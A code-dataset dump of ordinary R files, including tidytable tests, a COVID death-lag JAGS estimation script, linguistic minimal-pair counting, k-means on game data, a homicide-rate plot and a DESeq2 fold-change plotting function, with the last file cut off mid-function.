content large_stringlengths 0 6.46M | path large_stringlengths 3 331 | license_type large_stringclasses 2 values | repo_name large_stringlengths 5 125 | language large_stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.46M | extension large_stringclasses 75 values | text stringlengths 0 6.46M |
|---|---|---|---|---|---|---|---|---|---|
test_that("works with no input & works with NA", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.()
expect_named(unite_df, c("new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b_NA", "a_b_c"))
})
test_that("works with selected cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:b)
expect_named(unite_df, c("c", "new_col"))
expect_equal(unite_df$new_col, c("a_b", "a_b", "a_b"))
})
test_that("na.rm works", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, na.rm = TRUE)
expect_named(unite_df, "new_col")
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("can keep cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, remove = FALSE, na.rm = TRUE)
expect_named(unite_df, c("a", "b", "c", "new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("doesn't modify-by-reference", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
test_df %>%
unite.("new_col", a:b, na.rm = TRUE)
expect_named(test_df, c("a", "b", "c"))
})
| /tests/testthat/test-unite.R | permissive | lionel-/tidytable | R | false | false | 1,645 | r | test_that("works with no input & works with NA", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.()
expect_named(unite_df, c("new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b_NA", "a_b_c"))
})
test_that("works with selected cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:b)
expect_named(unite_df, c("c", "new_col"))
expect_equal(unite_df$new_col, c("a_b", "a_b", "a_b"))
})
test_that("na.rm works", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, na.rm = TRUE)
expect_named(unite_df, "new_col")
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("can keep cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, remove = FALSE, na.rm = TRUE)
expect_named(unite_df, c("a", "b", "c", "new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("doesn't modify-by-reference", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
test_df %>%
unite.("new_col", a:b, na.rm = TRUE)
expect_named(test_df, c("a", "b", "c"))
})
|
library(R2jags)
library(lubridate)
library(tidyverse)
library(RColorBrewer)
library(vroom)
source("_00_initialization.R")
# Obtains the lags
covid_def_lag <-
covid_def %>%
filter(ENTIDAD_RES == "09") %>%
mutate(SEMANA_DEF = as.numeric(cut(FECHA_DEF, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(SEMANA_ACTUALIZACION = as.numeric(cut(FECHA_ACTUALIZACION, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(lag_dia = as.numeric(FECHA_ACTUALIZACION - FECHA_DEF)) %>%
mutate(lag_semana = SEMANA_ACTUALIZACION - SEMANA_DEF) %>%
select(ID_REGISTRO, FECHA_DEF, FECHA_ACTUALIZACION, SEMANA_DEF, SEMANA_ACTUALIZACION, lag_dia, lag_semana) %>%
filter(!is.na(SEMANA_DEF)) %>%
arrange(lag_semana)
for (ii in 1:length(fechas_val)) {
maxfecha <- fechas_val[ii]
wday <- wday(maxfecha, week_start=1)
# No considera ultima semana, al menos que sea completa
# (la base tiene que ser domingo para entrar en el analisis)
maxsemana <- unique(covid_def_lag$SEMANA_ACTUALIZACION[covid_def_lag$FECHA_ACTUALIZACION == maxfecha])
if (wday == 7) {
maxsemana <- maxsemana
} else {
maxsemana <- maxsemana - 1
}
print(paste("Starting", maxfecha, "----------------------------------"))
covid_def_lag_2 <-
covid_def_lag %>%
filter(SEMANA_ACTUALIZACION <= maxsemana) %>%
filter(SEMANA_DEF >= sem_min_fit) %>%
group_by(SEMANA_DEF, lag_semana) %>%
summarise(n=n()) %>%
group_by() %>%
filter( lag_semana>0) %>%
group_by(SEMANA_DEF) %>%
mutate(N=sum(n)) %>%
group_by() %>%
arrange(SEMANA_DEF, lag_semana)
covid_def_lag_2 %>% group_by(SEMANA_DEF) %>% summarise(sum(n)) %>% print(n=100)
# Crea los datos para estimacion en Jags:
semanas <- sort(unique(covid_def_lag_2$SEMANA_DEF))
lags <- rev(max(semanas) - semanas + 1)
I <- length(semanas)
Jmax <- length(lags)
Y <- matrix(rep(NA, I * Jmax), nrow = I)
for (i in 1:I) {
for (j in 1:(Jmax-i+1)) {
sem <- semanas[i]
lag <- lags[j]
jd_temp <- covid_def_lag_2 %>% filter(SEMANA_DEF == sem, lag_semana == lag)
if (length(jd_temp$SEMANA_DEF) == 0) {
yi <- 0
} else {
yi <- jd_temp$n
}
Y[i, j] <- yi
}
}
J <- Jmax:1
N <- rowSums(Y, na.rm=TRUE)
jags.data <- list(Y=Y, N=N, J=J, Jmax=Jmax, I=I)
# Prior
jags.data$alpha <- colSums(jags.data$Y, na.rm = TRUE)
#jags.data$alpha <- c(1000, rep(.01, Jmax-1))
if (mod == "model32" ) {
est_params <- c("NN", "p")
} else if(mod == "model33") {
est_params <- c("NN", "p", "l", "k")
}else if(mod == "model31") {
est_params <- c("NN", "p", "beta")
} else if (mod == "model32_1") {
est_params <- c("NN", "p")
} else if (mod == "model34") {
est_params <- c("NN", "p")
}
modelo <- do.call(jags.parallel, list(data = jags.data,
model.file=mod,
parameters.to.save=est_params,
DIC=FALSE,
n.chains=4, n.iter = 40000, n.burnin=20000,n.thin=100))
save(modelo, file = paste("mcmc_def/",mod,"_sem_cdmx/", maxfecha, "-",mod,".RData", sep=""))
}
| /_10_estimacion_def_sem_cdmx.R | no_license | humbertog/covid_mex | R | false | false | 3,328 | r | library(R2jags)
library(lubridate)
library(tidyverse)
library(RColorBrewer)
library(vroom)
source("_00_initialization.R")
# Obtains the lags
covid_def_lag <-
covid_def %>%
filter(ENTIDAD_RES == "09") %>%
mutate(SEMANA_DEF = as.numeric(cut(FECHA_DEF, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(SEMANA_ACTUALIZACION = as.numeric(cut(FECHA_ACTUALIZACION, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(lag_dia = as.numeric(FECHA_ACTUALIZACION - FECHA_DEF)) %>%
mutate(lag_semana = SEMANA_ACTUALIZACION - SEMANA_DEF) %>%
select(ID_REGISTRO, FECHA_DEF, FECHA_ACTUALIZACION, SEMANA_DEF, SEMANA_ACTUALIZACION, lag_dia, lag_semana) %>%
filter(!is.na(SEMANA_DEF)) %>%
arrange(lag_semana)
for (ii in 1:length(fechas_val)) {
maxfecha <- fechas_val[ii]
wday <- wday(maxfecha, week_start=1)
# No considera ultima semana, al menos que sea completa
# (la base tiene que ser domingo para entrar en el analisis)
maxsemana <- unique(covid_def_lag$SEMANA_ACTUALIZACION[covid_def_lag$FECHA_ACTUALIZACION == maxfecha])
if (wday == 7) {
maxsemana <- maxsemana
} else {
maxsemana <- maxsemana - 1
}
print(paste("Starting", maxfecha, "----------------------------------"))
covid_def_lag_2 <-
covid_def_lag %>%
filter(SEMANA_ACTUALIZACION <= maxsemana) %>%
filter(SEMANA_DEF >= sem_min_fit) %>%
group_by(SEMANA_DEF, lag_semana) %>%
summarise(n=n()) %>%
group_by() %>%
filter( lag_semana>0) %>%
group_by(SEMANA_DEF) %>%
mutate(N=sum(n)) %>%
group_by() %>%
arrange(SEMANA_DEF, lag_semana)
covid_def_lag_2 %>% group_by(SEMANA_DEF) %>% summarise(sum(n)) %>% print(n=100)
# Crea los datos para estimacion en Jags:
semanas <- sort(unique(covid_def_lag_2$SEMANA_DEF))
lags <- rev(max(semanas) - semanas + 1)
I <- length(semanas)
Jmax <- length(lags)
Y <- matrix(rep(NA, I * Jmax), nrow = I)
for (i in 1:I) {
for (j in 1:(Jmax-i+1)) {
sem <- semanas[i]
lag <- lags[j]
jd_temp <- covid_def_lag_2 %>% filter(SEMANA_DEF == sem, lag_semana == lag)
if (length(jd_temp$SEMANA_DEF) == 0) {
yi <- 0
} else {
yi <- jd_temp$n
}
Y[i, j] <- yi
}
}
J <- Jmax:1
N <- rowSums(Y, na.rm=TRUE)
jags.data <- list(Y=Y, N=N, J=J, Jmax=Jmax, I=I)
# Prior
jags.data$alpha <- colSums(jags.data$Y, na.rm = TRUE)
#jags.data$alpha <- c(1000, rep(.01, Jmax-1))
if (mod == "model32" ) {
est_params <- c("NN", "p")
} else if(mod == "model33") {
est_params <- c("NN", "p", "l", "k")
}else if(mod == "model31") {
est_params <- c("NN", "p", "beta")
} else if (mod == "model32_1") {
est_params <- c("NN", "p")
} else if (mod == "model34") {
est_params <- c("NN", "p")
}
modelo <- do.call(jags.parallel, list(data = jags.data,
model.file=mod,
parameters.to.save=est_params,
DIC=FALSE,
n.chains=4, n.iter = 40000, n.burnin=20000,n.thin=100))
save(modelo, file = paste("mcmc_def/",mod,"_sem_cdmx/", maxfecha, "-",mod,".RData", sep=""))
}
|
##' Convert data into mcstate format; this is a thin wrapper around
##' [mcstate::particle_filter_data()] which adds a dummy step in front
##' of the first data point so that we can use the previous state and
##' the current states to convert cumulative measures into net daily
##' changes.
##'
##' @title Prepare data for mcstate
##'
##' @param data A `data.frame` object suitable for
##' [mcstate::particle_filter_data()]
##'
##' @param start_date The start date, as a [sircovid_date()], R "Date"
##' object or a string in ISO 8601 format (YYYY-MM-DD)
##'
##' @param dt The time step (fraction of a day that each step
##' represents) as used to create the model object
##'
##' @return A data.frame suitable for use with `mcstate` functions
##' such as [mcstate::particle_filter()] and [mcstate::pmcmc()]
##'
##' @export
##' @examples
##' # A data sert that has data from the first of February to the first of
##' # March (one column of data called 'x')
##' from <- as.Date("2020-02-01")
##' to <- as.Date("2020-03-01")
##' d <- data.frame(date = seq(from, to, by = 1),
##' x = runif(to - from + 1),
##' stringsAsFactors = FALSE)
##'
##' # Get this ready for sircovid/mcstate assuming the seeding starts on
##' # the 15th of January and we take 4 steps per day.
##' sircovid_data(d, start_date = "2020-01-15", 1 / 4)
sircovid_data <- function(data, start_date, dt) {
start_date <- as_sircovid_date(start_date)
## Some horrid off-by-one unpleasantness lurking here. See this commit:
## https://github.com/mrc-ide/mcstate/commit/97e68ad
## for for more details, and the accompanying PR.
##
## To make this work, we've manually inserted a fake reporting
## period at the first row of the file so that our compare works
## correctly; this should be something that mcstate can do for us.
data$date <- sircovid_date(data$date)
rate <- 1 / dt
data <- mcstate::particle_filter_data(data, "date", rate, start_date)
data
}
| /R/data.R | permissive | mrc-ide/sircovid2 | R | false | false | 1,980 | r | ##' Convert data into mcstate format; this is a thin wrapper around
##' [mcstate::particle_filter_data()] which adds a dummy step in front
##' of the first data point so that we can use the previous state and
##' the current states to convert cumulative measures into net daily
##' changes.
##'
##' @title Prepare data for mcstate
##'
##' @param data A `data.frame` object suitable for
##' [mcstate::particle_filter_data()]
##'
##' @param start_date The start date, as a [sircovid_date()], R "Date"
##' object or a string in ISO 8601 format (YYYY-MM-DD)
##'
##' @param dt The time step (fraction of a day that each step
##' represents) as used to create the model object
##'
##' @return A data.frame suitable for use with `mcstate` functions
##' such as [mcstate::particle_filter()] and [mcstate::pmcmc()]
##'
##' @export
##' @examples
##' # A data sert that has data from the first of February to the first of
##' # March (one column of data called 'x')
##' from <- as.Date("2020-02-01")
##' to <- as.Date("2020-03-01")
##' d <- data.frame(date = seq(from, to, by = 1),
##' x = runif(to - from + 1),
##' stringsAsFactors = FALSE)
##'
##' # Get this ready for sircovid/mcstate assuming the seeding starts on
##' # the 15th of January and we take 4 steps per day.
##' sircovid_data(d, start_date = "2020-01-15", 1 / 4)
sircovid_data <- function(data, start_date, dt) {
start_date <- as_sircovid_date(start_date)
## Some horrid off-by-one unpleasantness lurking here. See this commit:
## https://github.com/mrc-ide/mcstate/commit/97e68ad
## for for more details, and the accompanying PR.
##
## To make this work, we've manually inserted a fake reporting
## period at the first row of the file so that our compare works
## correctly; this should be something that mcstate can do for us.
data$date <- sircovid_date(data$date)
rate <- 1 / dt
data <- mcstate::particle_filter_data(data, "date", rate, start_date)
data
}
|
source("min_pair_functions.R")
# create a data frame to hold minimal pairs and populate it
starling.min.pairs = data.frame(Language = c(), Seg1 = c(), Phon1 = c(), Seg2 = c(), Phon2 = c(), stringsAsFactors = F)
# for each language,
for(i in 1:nrow(starling.segs)) {
# get the language data
lang.id = starling.segs$Language[i]
lang = starling.segs$Language[i]
subtable = starling.nohoms[starling.nohoms$Language == lang.id & starling.nohoms$PhonStrip != "",]
current.segs = as.character(unlist(strsplit(starling.segs$Segs[i], " ")))
# tokenize all the words into characters (so that this isn't done repeatedly
# inside the following loop)
tokenized.words = list()
for(j in 1:nrow(subtable)) {
tokenized.words[[j]] = tokenize.word(subtable$PhonStrip[j], segs = current.segs)
subtable$Length[j] = length(tokenized.words[[j]])
}
# for each word length of the language,
for(j in as.numeric(names(table(subtable$Length)[as.numeric(table(subtable$Length)) > 1]))) {
subsubtable = subtable[subtable$Length == j,]
sub.tokenized.words = tokenized.words[unlist(lapply(tokenized.words, length)) == j]
# for each word of that length in the language,
for(k in 1:(nrow(subsubtable) - 1)) {
phon1 = sub.tokenized.words[[k]]
phonString1 = subsubtable$PhonStrip[k]
# for each other word of that length in the language,
for(l in (k + 1):nrow(subsubtable)) {
phon2 = sub.tokenized.words[[l]]
phonString2 = subsubtable$PhonStrip[l]
# check whether the words are a minimal pair
starling.min.segs = min.pair(phon1, phon2)
# if so,
if(starling.min.segs[1] != "" & starling.min.segs[2] != "") {
# print the minimal pair and store it in the data frame
print(paste(lang, phonString1, phonString2))
starling.min.pairs = rbind(starling.min.pairs, data.frame(Language = lang.id, Seg1 = starling.min.segs[1], Phon1 = phonString1, Seg2 = starling.min.segs[2], Phon2 = phonString2, stringsAsFactors = F))
}
}
}
}
}
rm(i, lang.id, lang, subtable, current.segs, tokenized.words, j, subsubtable, sub.tokenized.words, k, phon1, phonString1, l, phon2, phonString2, starling.min.segs)
# add one more field to the data frame, which pastes together the two
# contrasting segments of each minimal pair - for any pair of segments, it
# always combines them in the same order, which makes this field useful for
# getting overall counts
starling.min.pairs$Contrast = ""
for(s in starling.all.segs) {
starling.min.pairs$Contrast = ifelse(starling.min.pairs$Seg1 == s | starling.min.pairs$Seg2 == s, ifelse(starling.min.pairs$Contrast == "", s, paste(starling.min.pairs$Contrast, "_", s, sep = "")), starling.min.pairs$Contrast)
}
rm(s)
# write the data frame to a csv file (just in case)
write.csv(starling.min.pairs, "starling_min_pairs.csv")
# create a data frame for storing total minimal pair counts by language; include
# separate counts for all minimal pairs and for minimal pairs that are at least
# 3 characters long (to avoid counting affixes that are listed by themselves)
starling.min.pair.counts = data.frame(Language = names(table(starling$Language)))
starling.min.pair.counts$StdLangName = ""
starling.min.pair.counts$Vocab = 0
starling.min.pair.counts$MinPairs = 0
starling.min.pair.counts$LongMinPairs = 0
# for each language,
for(i in 1:nrow(starling.min.pair.counts)) {
# get the total recorded vocabulary size for the language
starling.min.pair.counts$Vocab[i] = nrow(starling[starling$Language == starling.min.pair.counts$Language[i],])
# get the size of the segment inventory
starling.min.pair.counts$NumSegs[i] = length(unlist(strsplit(starling.segs$Segs[i], " ")))
# get the mean and median word length
starling.min.pair.counts$MeanWordLength[i] = mean(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
starling.min.pair.counts$MedianWordLength[i] = median(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
# get the number of minimal pairs observed for the language
starling.min.pair.counts$MinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i],])
starling.min.pair.counts$LongMinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i] & nchar(starling.min.pairs$Phon1) > 2 & nchar(starling.min.pairs$Phon2) > 2,])
}
rm(i)
# write the results to a csv file (just in case)
write.csv(starling.min.pair.counts, "starling_min_pair_counts.csv")
| /load_min_pairs_starling.R | no_license | kaplanas/Minimal-Pair-Counts | R | false | false | 4,594 | r | source("min_pair_functions.R")
# create a data frame to hold minimal pairs and populate it
starling.min.pairs = data.frame(Language = c(), Seg1 = c(), Phon1 = c(), Seg2 = c(), Phon2 = c(), stringsAsFactors = F)
# for each language,
for(i in 1:nrow(starling.segs)) {
# get the language data
lang.id = starling.segs$Language[i]
lang = starling.segs$Language[i]
subtable = starling.nohoms[starling.nohoms$Language == lang.id & starling.nohoms$PhonStrip != "",]
current.segs = as.character(unlist(strsplit(starling.segs$Segs[i], " ")))
# tokenize all the words into characters (so that this isn't done repeatedly
# inside the following loop)
tokenized.words = list()
for(j in 1:nrow(subtable)) {
tokenized.words[[j]] = tokenize.word(subtable$PhonStrip[j], segs = current.segs)
subtable$Length[j] = length(tokenized.words[[j]])
}
# for each word length of the language,
for(j in as.numeric(names(table(subtable$Length)[as.numeric(table(subtable$Length)) > 1]))) {
subsubtable = subtable[subtable$Length == j,]
sub.tokenized.words = tokenized.words[unlist(lapply(tokenized.words, length)) == j]
# for each word of that length in the language,
for(k in 1:(nrow(subsubtable) - 1)) {
phon1 = sub.tokenized.words[[k]]
phonString1 = subsubtable$PhonStrip[k]
# for each other word of that length in the language,
for(l in (k + 1):nrow(subsubtable)) {
phon2 = sub.tokenized.words[[l]]
phonString2 = subsubtable$PhonStrip[l]
# check whether the words are a minimal pair
starling.min.segs = min.pair(phon1, phon2)
# if so,
if(starling.min.segs[1] != "" & starling.min.segs[2] != "") {
# print the minimal pair and store it in the data frame
print(paste(lang, phonString1, phonString2))
starling.min.pairs = rbind(starling.min.pairs, data.frame(Language = lang.id, Seg1 = starling.min.segs[1], Phon1 = phonString1, Seg2 = starling.min.segs[2], Phon2 = phonString2, stringsAsFactors = F))
}
}
}
}
}
rm(i, lang.id, lang, subtable, current.segs, tokenized.words, j, subsubtable, sub.tokenized.words, k, phon1, phonString1, l, phon2, phonString2, starling.min.segs)
# add one more field to the data frame, which pastes together the two
# contrasting segments of each minimal pair - for any pair of segments, it
# always combines them in the same order, which makes this field useful for
# getting overall counts
starling.min.pairs$Contrast = ""
for(s in starling.all.segs) {
starling.min.pairs$Contrast = ifelse(starling.min.pairs$Seg1 == s | starling.min.pairs$Seg2 == s, ifelse(starling.min.pairs$Contrast == "", s, paste(starling.min.pairs$Contrast, "_", s, sep = "")), starling.min.pairs$Contrast)
}
rm(s)
# write the data frame to a csv file (just in case)
write.csv(starling.min.pairs, "starling_min_pairs.csv")
# create a data frame for storing total minimal pair counts by language; include
# separate counts for all minimal pairs and for minimal pairs that are at least
# 3 characters long (to avoid counting affixes that are listed by themselves)
starling.min.pair.counts = data.frame(Language = names(table(starling$Language)))
starling.min.pair.counts$StdLangName = ""
starling.min.pair.counts$Vocab = 0
starling.min.pair.counts$MinPairs = 0
starling.min.pair.counts$LongMinPairs = 0
# for each language,
for(i in 1:nrow(starling.min.pair.counts)) {
# get the total recorded vocabulary size for the language
starling.min.pair.counts$Vocab[i] = nrow(starling[starling$Language == starling.min.pair.counts$Language[i],])
# get the size of the segment inventory
starling.min.pair.counts$NumSegs[i] = length(unlist(strsplit(starling.segs$Segs[i], " ")))
# get the mean and median word length
starling.min.pair.counts$MeanWordLength[i] = mean(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
starling.min.pair.counts$MedianWordLength[i] = median(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
# get the number of minimal pairs observed for the language
starling.min.pair.counts$MinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i],])
starling.min.pair.counts$LongMinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i] & nchar(starling.min.pairs$Phon1) > 2 & nchar(starling.min.pairs$Phon2) > 2,])
}
rm(i)
# write the results to a csv file (just in case)
write.csv(starling.min.pair.counts, "starling_min_pair_counts.csv")
|
library(psych)
### Name: SD
### Title: Find the Standard deviation for a vector, matrix, or data.frame
### - do not return error if there are no cases
### Aliases: SD
### Keywords: models
### ** Examples
data(attitude)
apply(attitude,2,sd) #all complete
attitude[,1] <- NA
SD(attitude) #missing a column
describe(attitude)
| /data/genthat_extracted_code/psych/examples/SD.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 332 | r | library(psych)
### Name: SD
### Title: Find the Standard deviation for a vector, matrix, or data.frame
### - do not return error if there are no cases
### Aliases: SD
### Keywords: models
### ** Examples
data(attitude)
apply(attitude,2,sd) #all complete
attitude[,1] <- NA
SD(attitude) #missing a column
describe(attitude)
|
library(dplyr)
# load csv into a data frame, omit gameID column
lol <- select(read.csv("high_diamond_ranked_10min.csv"), -gameId)
# select number of clusters using total within sum square error
wss <- 0
wss_plot <- function () {
for (i in 1:10) {
km.out <- kmeans(lol, centers = i, nstart = 20, iter.max = 50)
wss[i] <- km.out$tot.withinss
}
plot(1:10, wss, type = "b",
xlab = "Number of Clusters",
ylab = "Within groups sum of squares")
}
# uncomment the following to produce wss plot and find k
# wss_plot()
# assign number of clusters from wss plot
k <- 3
# Build model with k clusters: km.out
km.out <- kmeans(lol, centers = k, nstart = 20, iter.max = 50)
# View the resulting model
km.out
# Plot of Defense vs. Speed by cluster membership
plot(lol[, c("blueExperienceDiff", "blueGoldDiff")],
col = km.out$cluster,
main = paste("k-means clustering of League of Legends with", k, "clusters"),
xlab = "blueExperienceDiff", ylab = "blueExperienceDiff")
| /kmeans.R | no_license | zifangu/surf-2020 | R | false | false | 1,034 | r | library(dplyr)
# load csv into a data frame, omit gameID column
lol <- select(read.csv("high_diamond_ranked_10min.csv"), -gameId)
# select number of clusters using total within sum square error
wss <- 0
wss_plot <- function () {
for (i in 1:10) {
km.out <- kmeans(lol, centers = i, nstart = 20, iter.max = 50)
wss[i] <- km.out$tot.withinss
}
plot(1:10, wss, type = "b",
xlab = "Number of Clusters",
ylab = "Within groups sum of squares")
}
# uncomment the following to produce wss plot and find k
# wss_plot()
# assign number of clusters from wss plot
k <- 3
# Build model with k clusters: km.out
km.out <- kmeans(lol, centers = k, nstart = 20, iter.max = 50)
# View the resulting model
km.out
# Plot of Defense vs. Speed by cluster membership
plot(lol[, c("blueExperienceDiff", "blueGoldDiff")],
col = km.out$cluster,
main = paste("k-means clustering of League of Legends with", k, "clusters"),
xlab = "blueExperienceDiff", ylab = "blueExperienceDiff")
|
##########################################################
# author: Ignacio Sarmiento-Barbieri
#
##########################################################
#Clean the workspace
rm(list=ls())
cat("\014")
local({r <- getOption("repos"); r["CRAN"] <- "http://cran.r-project.org"; options(repos=r)}) #set repo
#Load Packages
pkg<-list("dplyr","ggplot2")
lapply(pkg, require, character.only=T)
rm(pkg)
#Wd
setwd("~/Dropbox/Phd Illinois/Research/Neigh_crime/Unlocking_amenities/github/Unlocking-Amenities/")
TD<-readRDS("stores/data_unlocking_amenities_responses.rds")
TD<-data.frame(TD)
TD<- TD %>% ungroup()
Homicides<-TD %>% group_by(city,year) %>% summarize(homicides=min(total_city.homicides)) %>% ungroup()
#Chicago area: 234 mi²
#NY area: 304.6 mi²
#Philadelphia area: 141.7 mi²
Homicides$homicides[Homicides$city=="Chicago"]<-Homicides$homicides[Homicides$city=="Chicago"]/234
Homicides$homicides[Homicides$city=="NY"]<-Homicides$homicides[Homicides$city=="NY"]/304.6
Homicides$homicides[Homicides$city=="Philly"]<-Homicides$homicides[Homicides$city=="Philly"]/141.7
ggplot(Homicides,aes(year, homicides, group=city,linetype=factor(city) ) )+
geom_line( size=.25) +
#scale_linetype_manual(name="",values=c("dashed","solid","dotted"),labels=c("Chicago","New York","Philadelphia"))+
geom_text(data = Homicides %>% filter(year == last(year)),
aes(label = c("Chicago","New York","Philadelphia"), x = year -0.4 , y = homicides +0.15), size=1.5) +
xlab("Year") +
ylab("Homicides Rate") +
scale_x_continuous(breaks = seq(2001, 2016, by=1)) +
expand_limits(y=0) +
theme_bw() +
ylim(0.5,3.5) +
theme(
axis.ticks.x=element_blank(),
panel.grid.minor.x=element_blank(),
axis.ticks.y=element_blank(),
panel.grid.major = element_line(size = 0.1),
legend.justification=c(.95,.95),
legend.position="none",#c(.95,.95),
text = element_text(size=4,family="Times"))
ggsave("views/fig3.jpg", height = 1.5, width = 2.7, units="in")
| /scripts/Figures/Fig3.R | no_license | uiuc-bdeep/Unlocking-Amenities | R | false | false | 1,996 | r | ##########################################################
# author: Ignacio Sarmiento-Barbieri
#
##########################################################
#Clean the workspace
rm(list=ls())
cat("\014")
local({r <- getOption("repos"); r["CRAN"] <- "http://cran.r-project.org"; options(repos=r)}) #set repo
#Load Packages
pkg<-list("dplyr","ggplot2")
lapply(pkg, require, character.only=T)
rm(pkg)
#Wd
setwd("~/Dropbox/Phd Illinois/Research/Neigh_crime/Unlocking_amenities/github/Unlocking-Amenities/")
TD<-readRDS("stores/data_unlocking_amenities_responses.rds")
TD<-data.frame(TD)
TD<- TD %>% ungroup()
Homicides<-TD %>% group_by(city,year) %>% summarize(homicides=min(total_city.homicides)) %>% ungroup()
#Chicago area: 234 mi²
#NY area: 304.6 mi²
#Philadelphia area: 141.7 mi²
Homicides$homicides[Homicides$city=="Chicago"]<-Homicides$homicides[Homicides$city=="Chicago"]/234
Homicides$homicides[Homicides$city=="NY"]<-Homicides$homicides[Homicides$city=="NY"]/304.6
Homicides$homicides[Homicides$city=="Philly"]<-Homicides$homicides[Homicides$city=="Philly"]/141.7
ggplot(Homicides,aes(year, homicides, group=city,linetype=factor(city) ) )+
geom_line( size=.25) +
#scale_linetype_manual(name="",values=c("dashed","solid","dotted"),labels=c("Chicago","New York","Philadelphia"))+
geom_text(data = Homicides %>% filter(year == last(year)),
aes(label = c("Chicago","New York","Philadelphia"), x = year -0.4 , y = homicides +0.15), size=1.5) +
xlab("Year") +
ylab("Homicides Rate") +
scale_x_continuous(breaks = seq(2001, 2016, by=1)) +
expand_limits(y=0) +
theme_bw() +
ylim(0.5,3.5) +
theme(
axis.ticks.x=element_blank(),
panel.grid.minor.x=element_blank(),
axis.ticks.y=element_blank(),
panel.grid.major = element_line(size = 0.1),
legend.justification=c(.95,.95),
legend.position="none",#c(.95,.95),
text = element_text(size=4,family="Times"))
ggsave("views/fig3.jpg", height = 1.5, width = 2.7, units="in")
|
#' plotLog2FC
#'
#' compare log2FC values from two DESeq2 results table
#' @export
plotLog2FC <- function(res1,
res2,
main_title = "",
x_label = "log2FC",
y_label = "log2FC",
lims = c(-5,5),
point_size = 0.25,
point_color = rgb(0.7,0.7,0.7,0.5),
selection_ids = NULL,
selection_id_type = "symbol",
selection_color = rgb(0.8,0,0,1),
selection_point_size = 0.5,
selection_legend = NULL,
selection_text_label = FALSE,
selection_text_size = 1.1,
selection_text_adj = -0.5,
add_lowess_line = F,
lowess_line_color = rgb(0.7,0,0.9,1),
lowess_line_width = 1.5,
legend_pos = "topleft"){
res_merged <- merge(x = as.data.frame(res1),
y = as.data.frame(res2),
by = "row.names")
plot(x = res_merged$log2FoldChange.x,
y = res_merged$log2FoldChange.y,
main = "",
xlab = x_label,
ylab = y_label,
ylim = lims,
xlim = lims,
col = point_color,
pch = 19, cex = point_size)
if(add_lowess_line){
lines(lowess(x = res_merged$log2FoldChange.x, y = res_merged$log2FoldChange.y),
col = lowess_line_color, lwd = lowess_line_width)
}
abline(h=0, v=0, col="grey32")
abline(coef = c(0,1), col="grey32", lty=2)
if(!(is.null(selection_ids))){
selection_id_type <- paste0(selection_id_type, ".x")
selection_vector <- res_merged[selection_id_type][,1] %in% selection_ids
points(x = res_merged$log2FoldChange.x[selection_vector],
y = res_merged$log2FoldChange.y[selection_vector],
col = selection_color,
pch = 19, cex = selection_point_size)
if(selection_text_label){
text(x = res_merged$log2FoldChange.x[selection_vector],
y = res_merged$log2FoldChange.y[selection_vector],
labels = res_merged[selection_id_type][,1][selection_vector],
adj = c(0, selection_text_adj),
col = selection_color, cex = selection_text_size)
}
} else {
selection_vector <- FALSE
}
if(!(is.null(selection_legend)) & sum(selection_vector) > 0){
legend(legend_pos,
legend = c(selection_legend),
bg = "white",
col = c(selection_color), pch = 19, cex = 1)
}
}
| /R/plotLog2FC.R | permissive | tschauer/HelpersforDESeq2 | R | false | false | 3,030 | r | #' plotLog2FC
#'
#' compare log2FC values from two DESeq2 results table
#' @export
plotLog2FC <- function(res1,
res2,
main_title = "",
x_label = "log2FC",
y_label = "log2FC",
lims = c(-5,5),
point_size = 0.25,
point_color = rgb(0.7,0.7,0.7,0.5),
selection_ids = NULL,
selection_id_type = "symbol",
selection_color = rgb(0.8,0,0,1),
selection_point_size = 0.5,
selection_legend = NULL,
selection_text_label = FALSE,
